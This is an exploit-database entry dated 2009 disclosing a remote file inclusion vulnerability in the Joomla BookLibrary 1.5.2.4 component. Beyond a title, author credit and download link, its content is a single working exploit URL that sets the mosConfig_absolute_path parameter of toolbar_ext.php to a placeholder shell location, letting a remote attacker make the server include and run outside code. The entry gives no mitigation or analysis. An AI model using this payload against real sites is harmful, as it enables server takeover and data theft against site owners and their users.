id: 5335
date: 06/08/2009
title: Joomla Component BookLibrary 1.5.2.4 Remote File Inclusion Vuln
author: xoron
cves: 

===============================================================
Joomla Component BookLibrary 1.5.2.4 Remote File Inclusion Vuln
===============================================================


=-==-==-==-==-==-==-===-=-=-=-=-=-=-==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_booklibrary_1.5.2.4 Remote File Include

  Download: http://ordasoft.com/Download-document/3-BookLibrary-1.5.2.4-Basic.html

=-==-==-==-==-==-==-===-=-=-=-=-=-=-==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

=-==-==-==-==-==-==-==-=-=-=-=-=-=-===-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==-=-=-=-=-=-=-===-==-==-==-==-==-==-==-==-==-==-=




#  0day.today [2023-03-24]  #